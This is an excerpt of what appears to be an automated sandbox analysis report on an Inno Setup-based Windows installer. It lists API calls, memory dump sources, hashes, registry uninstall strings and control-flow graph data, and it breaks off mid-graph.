                                                                          • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E1A8,?,00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E04F
                                                                          • FreeSid.ADVAPI32(00000000,0042E1AF,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E1A2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                                          • String ID: CheckTokenMembership$advapi32.dll
                                                                          • API String ID: 2252812187-1888249752
                                                                          • Opcode ID: de8d44d672a8929b680763389e92ce8a04460e4e95b38bd413b506cbd288daf1
                                                                          • Instruction ID: 81e9a68d7eb5b753086264e3ea48cb09d3699a943d7b2bc0788aba7922d59162
                                                                          • Opcode Fuzzy Hash: de8d44d672a8929b680763389e92ce8a04460e4e95b38bd413b506cbd288daf1
                                                                          • Instruction Fuzzy Hash: DE51B271B40625AEEB10EAF69C42BBF77ACDB09704F54047BB900F7282D5BC89158A69

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1860 423c1c-423c50 1861 423c52-423c53 1860->1861 1862 423c84-423c9b call 423b78 1860->1862 1863 423c55-423c71 call 40b44c 1861->1863 1868 423cfc-423d01 1862->1868 1869 423c9d 1862->1869 1891 423c73-423c7b 1863->1891 1892 423c80-423c82 1863->1892 1870 423d03 1868->1870 1871 423d37-423d3c 1868->1871 1872 423ca3-423ca6 1869->1872 1873 423d60-423d70 1869->1873 1881 423fc1-423fc9 1870->1881 1882 423d09-423d11 1870->1882 1876 423d42-423d45 1871->1876 1877 4240aa-4240b8 IsIconic 1871->1877 1874 423cd5-423cd8 1872->1874 1875 423ca8 1872->1875 1879 423d72-423d77 1873->1879 1880 423d7b-423d83 call 4241a4 1873->1880 1887 423db9-423dc0 1874->1887 1888 423cde-423cdf 1874->1888 1883 423e06-423e16 call 423b94 1875->1883 1884 423cae-423cb1 1875->1884 1885 4240e6-4240fb call 424860 1876->1885 1886 423d4b-423d4c 1876->1886 1889 424162-42416a 1877->1889 1896 4240be-4240c9 GetFocus 1877->1896 1893 423d88-423d90 call 4241ec 1879->1893 1894 423d79-423d9c call 423b94 1879->1894 1880->1889 1881->1889 1890 423fcf-423fda call 4181f0 1881->1890 1897 423f23-423f4a SendMessageA 1882->1897 1898 423d17-423d1c 1882->1898 1883->1889 1899 423cb7-423cba 1884->1899 1900 423e2e-423e4a PostMessageA call 423b94 1884->1900 1885->1889 1910 423d52-423d55 1886->1910 1911 4240fd-424104 1886->1911 1887->1889 1902 423dc6-423dcd 1887->1902 1903 423ce5-423ce8 1888->1903 1904 423f4f-423f56 1888->1904 1909 424181-424187 1889->1909 1890->1889 1945 423fe0-423fef call 4181f0 IsWindowEnabled 1890->1945 1891->1909 1892->1862 1892->1863 1893->1889 1894->1889 1896->1889 1915 4240cf-4240d8 call 41f004 1896->1915 1897->1889 1906 423d22-423d23 1898->1906 1907 42405a-424065 1898->1907 1918 423cc0-423cc3 1899->1918 1919 423eb5-423ebc 1899->1919 1900->1889 1902->1889 1923 423dd3-423dd9 1902->1923 1924 423cee-423cf1 1903->1924 1925 423e4f-423e6f call 423b94 1903->1925 1904->1889 1934 423f5c-423f61 call 404e54 1904->1934 1927 424082-42408d 1906->1927 1928 423d29-423d2c 1906->1928 1907->1889 1930 42406b-42407d 1907->1930 1931 424130-424137 1910->1931 1932 423d5b 1910->1932 1921 424106-424119 call 4244e4 1911->1921 1922 42411b-42412e call 42453c 1911->1922 1915->1889 1956 4240de-4240e4 SetFocus 1915->1956 1938 423cc9-423cca 1918->1938 1939 423dde-423dec IsIconic 1918->1939 1940 423ebe-423ed1 call 423b24 1919->1940 1941 423eef-423f00 call 423b94 1919->1941 1921->1889 1922->1889 1923->1889 1943 423cf7 1924->1943 1944 423e1b-423e29 call 424188 1924->1944 1983 423e93-423eb0 call 423a94 PostMessageA 1925->1983 1984 423e71-423e8e call 423b24 PostMessageA 1925->1984 1927->1889 1952 424093-4240a5 1927->1952 1949 423d32 1928->1949 1950 423f66-423f6e 1928->1950 1930->1889 1947 42414a-424159 1931->1947 1948 424139-424148 1931->1948 1951 42415b-42415c call 423b94 1932->1951 1934->1889 1957 423cd0 1938->1957 1958 423da1-423da9 1938->1958 1964 423dfa-423e01 call 423b94 1939->1964 1965 423dee-423df5 call 423bd0 1939->1965 1989 423ee3-423eea call 423b94 1940->1989 1990 423ed3-423edd call 41ef68 1940->1990 1994 423f02-423f08 call 41eeb4 1941->1994 1995 423f16-423f1e call 423a94 1941->1995 1943->1951 1944->1889 1945->1889 1991 423ff5-424004 call 4181f0 IsWindowVisible 1945->1991 1947->1889 1948->1889 1949->1951 1950->1889 1971 423f74-423f7b 1950->1971 1979 424161 1951->1979 1952->1889 1956->1889 1957->1951 1958->1889 1973 423daf-423db4 call 422c5c 1958->1973 1964->1889 1965->1889 1971->1889 1982 423f81-423f90 call 4181f0 IsWindowEnabled 1971->1982 1973->1889 1979->1889 1982->1889 2005 423f96-423fac call 412320 1982->2005 1983->1889 1984->1889 1989->1889 1990->1989 1991->1889 2012 42400a-424055 GetFocus call 4181f0 SetFocus call 415250 SetFocus 1991->2012 2009 423f0d-423f10 1994->2009 1995->1889 2005->1889 2015 423fb2-423fbc 2005->2015 2009->1995 2012->1889 2015->1889
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4d8523de1586cc0fe21acf482102c1559735113aa6e2fedad80b263b22362a32
                                                                          • Instruction ID: b8faa7015d3197e79f6d1719c020e5f6697e37216349d11362fcbf3b9a892ac2
                                                                          • Opcode Fuzzy Hash: 4d8523de1586cc0fe21acf482102c1559735113aa6e2fedad80b263b22362a32
                                                                          • Instruction Fuzzy Hash: 42E1A230700125EFD704EF69E989A6EB7B5EF94304F9480A6E545AB352C73CEE91DB08
                                                                          APIs
                                                                            • Part of subcall function 00493D2C: GetWindowRect.USER32(00000000), ref: 00493D42
                                                                          • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00466E8B
                                                                            • Part of subcall function 0041D6C0: GetObjectA.GDI32(?,00000018,00466EA5), ref: 0041D6EB
                                                                            • Part of subcall function 00466898: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046693B
                                                                            • Part of subcall function 00466898: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00466961
                                                                            • Part of subcall function 00466898: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004669B8
                                                                            • Part of subcall function 00466254: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00466F40,00000000,00000000,00000000,0000000C,00000000), ref: 0046626C
                                                                            • Part of subcall function 00493FB0: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 00493FBA
                                                                            • Part of subcall function 0042EBAC: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EC1C
                                                                            • Part of subcall function 0042EBAC: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EC39
                                                                            • Part of subcall function 00493C7C: 73A0A570.USER32(00000000,?,?,?), ref: 00493C9E
                                                                            • Part of subcall function 00493C7C: SelectObject.GDI32(?,00000000), ref: 00493CC4
                                                                            • Part of subcall function 00493C7C: 73A0A480.USER32(00000000,?,00493D22,00493D1B,?,00000000,?,?,?), ref: 00493D15
                                                                            • Part of subcall function 00493FA0: MulDiv.KERNEL32(0000004B,?,00000006), ref: 00493FAA
                                                                          • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,0234D8D0,0234F524,?,?,0234F554,?,?,0234F5A4,?), ref: 00467B3B
                                                                          • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00467B4C
                                                                          • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00467B64
                                                                            • Part of subcall function 0042A06C: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A082
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$AppendExtractIconObject$A480A570AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectSelectSendSystemUserWindow
                                                                          • String ID: $(Default)$STOPIMAGE
                                                                          • API String ID: 3271511185-770201673
                                                                          • Opcode ID: 37423c6cb51a93f280f9daeb0ce5abe33e3f8599bfcda42b6dea5e3f600f0df5
                                                                          • Instruction ID: 7cc469b3bd63a428f44d838a58e066ff967143afc9c1970ffe4cf99f77f4ae1f
                                                                          • Opcode Fuzzy Hash: 37423c6cb51a93f280f9daeb0ce5abe33e3f8599bfcda42b6dea5e3f600f0df5
                                                                          • Instruction Fuzzy Hash: 9DF2C6386005148FCB00EB59D5D9F9973F1FF4A308F1542B6E5049B36ADB78AC4ACB8A
                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00474072,?,?,0049B178,00000000), ref: 00473F61
                                                                          • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,00474072,?,?,0049B178,00000000), ref: 0047403E
                                                                          • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,00474072,?,?,0049B178,00000000), ref: 0047404C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext
                                                                          • String ID: unins$unins???.*
                                                                          • API String ID: 3541575487-1009660736
                                                                          • Opcode ID: 74e8728ae2360d7cc9e6142747c4e784bc21d11db711cb29493a318ee3c6f59d
                                                                          • Instruction ID: 4fd1d9fbc71e550ec417509903356e65f0bc22e0d19a654d6a5f314750c2dfa9
                                                                          • Opcode Fuzzy Hash: 74e8728ae2360d7cc9e6142747c4e784bc21d11db711cb29493a318ee3c6f59d
                                                                          • Instruction Fuzzy Hash: 3D3163746001489FCB20EB65C981AEEB7BDDF84304F5184B6E50CAB2A2DB39DF458F58
                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00452123,?,?,-00000001,00000000), ref: 004520FD
                                                                          • GetLastError.KERNEL32(00000000,?,00000000,00452123,?,?,-00000001,00000000), ref: 00452105
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileFindFirstLast
                                                                          • String ID:
                                                                          • API String ID: 873889042-0
                                                                          • Opcode ID: 53d0b0f71413149149492da54f6d795d092e0f5f146a7a05654b1b551a70fbd2
                                                                          • Instruction ID: f9611aeb3029889b76a7ade8829495a9d918b249c8fbd3e45bbd36cd3e6629b4
                                                                          • Opcode Fuzzy Hash: 53d0b0f71413149149492da54f6d795d092e0f5f146a7a05654b1b551a70fbd2
                                                                          • Instruction Fuzzy Hash: 1DF04931A04604AB8B10DB6AAD0149FB7FCDB46725710467BFC14E3282EA784E088598
                                                                          APIs
                                                                          • GetVersion.KERNEL32(?,0046D1AE), ref: 0046D122
                                                                          • CoCreateInstance.OLE32(00498B64,00000000,00000001,00498B74,?,?,0046D1AE), ref: 0046D13E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CreateInstanceVersion
                                                                          • String ID:
                                                                          • API String ID: 1462612201-0
                                                                          • Opcode ID: 7e99c10d7870a2a4e40b689fd77bd4c1fbc398cb1ecae8ca6f7261d0d29e43fa
                                                                          • Instruction ID: 1e059e1ff20256b2d38cad76cdb56475a0db9ba99d2cbde6061077ac095a0934
                                                                          • Opcode Fuzzy Hash: 7e99c10d7870a2a4e40b689fd77bd4c1fbc398cb1ecae8ca6f7261d0d29e43fa
                                                                          • Instruction Fuzzy Hash: 56F0A7B0B40301DEEB10AB2ADD46B8B37C19713324F04413BB054962A0E7ED8880CB9F
                                                                          APIs
                                                                          • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049A4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: InfoLocale
                                                                          • String ID:
                                                                          • API String ID: 2299586839-0
                                                                          • Opcode ID: d9147d9d411e4ddcfbb477174297996358b0f3244354f1dc1cbfcde03a7bd03f
                                                                          • Instruction ID: d3b8e551ebd18b966166ca098383beb9494d3946d3c482517005b7019d2e894c
                                                                          • Opcode Fuzzy Hash: d9147d9d411e4ddcfbb477174297996358b0f3244354f1dc1cbfcde03a7bd03f
                                                                          • Instruction Fuzzy Hash: EEE0D87170021467D711A95A9C869F7B35CA758314F00427FB949EB3C2EDB8DE8046ED
                                                                          APIs
                                                                          • NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424161,?,00000000,0042416C), ref: 00423BBE
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: NtdllProc_Window
                                                                          • String ID:
                                                                          • API String ID: 4255912815-0
                                                                          • Opcode ID: b8a7fb1636f510e04679fc1c95d6034bf50f85873c956373ae04f9643015f65e
                                                                          • Instruction ID: 62037174fb3a4e63d39f4d80a9d1e591ad15120c94b51c82d4663250cb3dbf53
                                                                          • Opcode Fuzzy Hash: b8a7fb1636f510e04679fc1c95d6034bf50f85873c956373ae04f9643015f65e
                                                                          • Instruction Fuzzy Hash: A0F0C579205608AFCB40DF9DC588D4AFBE8FB4C260B158295B988CB321C234FE808F94
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: NameUser
                                                                          • String ID:
                                                                          • API String ID: 2645101109-0
                                                                          • Opcode ID: b308eefd78fc34ccedab6b1389f53df2d3f8bc27a278cf7cb0c73ee59b873f37
                                                                          • Instruction ID: 76809c6cbed83fd478a986dc42ef3113a42af1b7be0c57f55a4460954ad8dcd3
                                                                          • Opcode Fuzzy Hash: b308eefd78fc34ccedab6b1389f53df2d3f8bc27a278cf7cb0c73ee59b873f37
                                                                          • Instruction Fuzzy Hash: 54D0CD7534430063C7006AA99C82597358C4784305F00443F7CC5DA2C3E5BDDA88565A
                                                                          APIs
                                                                          • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F3B0
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: NtdllProc_Window
                                                                          • String ID:
                                                                          • API String ID: 4255912815-0
                                                                          • Opcode ID: 463407ea8ab64360e41f6c039c0e682b96e3ddf2f94f44b918dd9fba9020941f
                                                                          • Instruction ID: f6c568c4939315a2eda578795105166964a56c952c5b5facb2271ccc97efa3bd
                                                                          • Opcode Fuzzy Hash: 463407ea8ab64360e41f6c039c0e682b96e3ddf2f94f44b918dd9fba9020941f
                                                                          • Instruction Fuzzy Hash: B8D05E7221010D6B8B00DE99D840C6F33AC9B88700BA08825F948C7205C634EC108BA4

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 406 46e080-46e0b2 407 46e0b4-46e0bb 406->407 408 46e0cf 406->408 410 46e0c6-46e0cd 407->410 411 46e0bd-46e0c4 407->411 409 46e0d6-46e10e call 403634 call 403738 call 42dde8 408->409 418 46e110-46e124 call 403738 call 42dde8 409->418 419 46e129-46e152 call 403738 call 42dd0c 409->419 410->409 411->408 411->410 418->419 427 46e154-46e15d call 46dd50 419->427 428 46e162-46e18b call 46de6c 419->428 427->428 432 46e19d-46e1a0 call 403400 428->432 433 46e18d-46e19b call 403494 428->433 437 46e1a5-46e1f0 call 46de6c call 42c40c call 46deb4 call 46de6c 432->437 433->437 446 46e206-46e227 call 454ab8 call 46de6c 437->446 447 46e1f2-46e205 call 46dedc 437->447 454 46e27d-46e284 446->454 455 46e229-46e27c call 46de6c call 478464 call 46de6c call 478464 call 46de6c 446->455 447->446 456 46e286-46e2c3 call 478464 call 46de6c call 478464 call 46de6c 454->456 457 46e2c4-46e2cb 454->457 455->454 456->457 459 46e30c-46e331 call 40b44c call 46de6c 457->459 460 46e2cd-46e30b call 46de6c * 3 457->460 481 46e333-46e33e call 47ad88 459->481 482 46e340-46e349 call 403494 459->482 460->459 491 46e34e-46e51b call 403778 call 46de6c call 47ad88 call 46deb4 call 403494 call 40357c * 2 call 46de6c call 403494 call 40357c * 2 call 46de6c call 47ad88 call 46deb4 call 47ad88 call 46deb4 call 47ad88 call 46deb4 call 47ad88 call 46deb4 call 47ad88 call 46deb4 call 47ad88 call 46deb4 call 47ad88 call 46deb4 call 47ad88 call 46deb4 call 47ad88 call 46deb4 call 47ad88 481->491 482->491 556 46e531-46e53f call 46dedc 491->556 557 46e51d-46e52f call 46de6c 491->557 561 46e544 556->561 562 46e545-46e58e call 46dedc call 46df10 call 46de6c call 47ad88 call 46df74 557->562 561->562 573 46e5b4-46e5be 562->573 574 46e590-46e5ae call 46dedc * 2 562->574 576 46e5c4-46e5cb 573->576 577 46e662-46e669 573->577 588 46e5b3 574->588 581 46e62f-46e63a 576->581 582 46e5cd-46e5f1 call 430a40 576->582 578 46e6c3-46e6d9 RegCloseKey 577->578 579 46e66b-46e6a1 call 49314c 577->579 579->578 585 46e63d-46e641 581->585 582->585 592 46e5f3-46e5f4 582->592 585->577 589 46e643-46e65c call 430a7c call 46dedc 585->589 588->573 598 46e661 589->598 594 46e5f6-46e61c call 40b44c call 4780d8 592->594 601 46e61e-46e624 call 430a40 594->601 602 46e629-46e62b 594->602 598->577 601->602 602->594 604 46e62d 602->604 604->585
                                                                          APIs
                                                                            • Part of subcall function 0046DE6C: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,?,00474FCB,0049B178,?,0046E183,?,00000000,0046E6DA,?,_is1), ref: 0046DE8F
                                                                          • RegCloseKey.ADVAPI32(?,0046E6E1,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046E72C,?,?,0049B178,00000000), ref: 0046E6D4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseValue
                                                                          • String ID: " /SILENT$5.4.0 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                                          • API String ID: 3132538880-1122008755
                                                                          • Opcode ID: 8e42fddb56d3329dbef7a6a297206f9074c7af5ead7140c5731b4336ecc3ba8d
                                                                          • Instruction ID: d6e88d1f6cb7b2cefc9fba2fbd39931f8be9331f85677ee55fb68547bd3bf3cf
                                                                          • Opcode Fuzzy Hash: 8e42fddb56d3329dbef7a6a297206f9074c7af5ead7140c5731b4336ecc3ba8d
                                                                          • Instruction Fuzzy Hash: C3123034F001089BCB04EB56E981ADE77F5EF58304F60807BE8116B3A5EB79AD45CB5A

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1019 490c98-490ccc call 403684 1022 490cce-490cdd call 4467f0 Sleep 1019->1022 1023 490ce2-490cef call 403684 1019->1023 1028 491172-49118c call 403420 1022->1028 1029 490d1e-490d2b call 403684 1023->1029 1030 490cf1-490d19 call 44684c call 403738 FindWindowA call 446acc 1023->1030 1037 490d5a-490d67 call 403684 1029->1037 1038 490d2d-490d50 call 44684c call 403738 FindWindowA call 446acc 1029->1038 1030->1028 1047 490d69-490dab call 4467f0 * 4 SendMessageA call 446acc 1037->1047 1048 490db0-490dbd call 403684 1037->1048 1056 490d55 1038->1056 1047->1028 1057 490e0c-490e19 call 403684 1048->1057 1058 490dbf-490e07 call 4467f0 * 4 PostMessageA call 446924 1048->1058 1056->1028 1067 490e68-490e75 call 403684 1057->1067 1068 490e1b-490e63 call 4467f0 * 4 SendNotifyMessageA call 446924 1057->1068 1058->1028 1080 490ea2-490eaf call 403684 1067->1080 1081 490e77-490e9d call 44684c call 403738 RegisterClipboardFormatA call 446acc 1067->1081 1068->1028 1092 490eb1-490eeb call 4467f0 * 3 SendMessageA call 446acc 1080->1092 1093 490ef0-490efd call 403684 1080->1093 1081->1028 1092->1028 1108 490eff-490f3f call 4467f0 * 3 PostMessageA call 446924 1093->1108 1109 490f44-490f51 call 403684 1093->1109 1108->1028 1119 490f98-490fa5 call 403684 1109->1119 1120 490f53-490f93 call 4467f0 * 3 SendNotifyMessageA call 446924 1109->1120 1131 490ffa-491007 call 403684 1119->1131 1132 490fa7-490fc5 call 44684c call 42e2bc 1119->1132 1120->1028 1142 491009-491035 